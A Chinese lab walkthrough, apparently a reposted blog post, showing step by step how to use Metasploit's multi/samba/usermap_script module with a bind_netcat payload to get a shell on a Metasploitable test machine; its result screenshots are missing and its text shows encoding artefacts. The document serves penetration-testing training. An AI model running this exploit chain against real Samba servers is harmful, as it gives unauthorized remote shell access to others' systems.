Metaspliot 控制终端利用Samba漏洞渗透
Samba簡(jiǎn)介
Samba是linux和unix系統(tǒng)上實(shí)現(xiàn)smb協(xié)議的一個(gè)免費(fèi)軟件,由服務(wù)器及客戶端程序構(gòu)成,Samba是面向Linux和Unix環(huán)境的Windows互操作性套件。它適用于在可能包括Linux、Unix、Windows、macOS及其他操作系統(tǒng)的異構(gòu)環(huán)境下工作的那些人。Samba使用服務(wù)器消息塊(SMB)協(xié)議,Windows系統(tǒng)使用該協(xié)議相互聯(lián)系。使用Samba,你可以讓Linux系統(tǒng)將驅(qū)動(dòng)器映射到Windows系統(tǒng),可以讓W(xué)indows系統(tǒng)將驅(qū)動(dòng)器映射到Linux系統(tǒng),不過(guò)后者的可能性大得多。Samba讓你可以在Linux系統(tǒng)上模擬文件和打印服務(wù)。
實(shí)驗(yàn)環(huán)境
BT5 R1(攻擊機(jī)):10.10.29.128
Metasploitable_ubuntu:10.10.29.254
前提條件:兩臺(tái)機(jī)子能互ping通
實(shí)驗(yàn)步驟
1,使用命令msfconsole進(jìn)入終端控制臺(tái)接口
2,使用search命令從Metasploit滲透代碼中找出攻擊Samba服務(wù)的模塊
找到針對(duì)usermap_script安全漏洞的滲透攻擊模塊名稱為multi/samba/usermap_script。
3,運(yùn)行use multi/samba/usermap_scrip 命令選擇此滲透模塊
4,通過(guò)show payloads 查看該滲透攻擊模塊相兼容的攻擊載荷,執(zhí)行set payload cmd/unix/bind_netcat 選擇bind_netcat,通過(guò)netcat攻擊在滲透攻擊成功后執(zhí)行shell,并通過(guò)netcat綁定在一個(gè)監(jiān)聽端口
5,這里采用 cmd/unix/bind_netcat,使用netcat工具在滲透成功后執(zhí)行Shell,并通過(guò)netcat綁定在一個(gè)監(jiān)聽端口。
6,設(shè)置完攻擊載荷,查看需要配置的參數(shù):
7,看到RHOST需要設(shè)置,其它選擇默認(rèn)設(shè)置,將RHOST設(shè)置為靶機(jī)IP10.10.29.254
8,輸入命令 “exploit”開始執(zhí)行
查看地址
?
?
?
?
?
總結(jié)
以上是生活随笔為你收集整理的Metaspliot 控制终端利用Samba漏洞渗透的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: Kali利用msf对MS10_061漏洞
- 下一篇: Metasploit入门用法(主动攻击)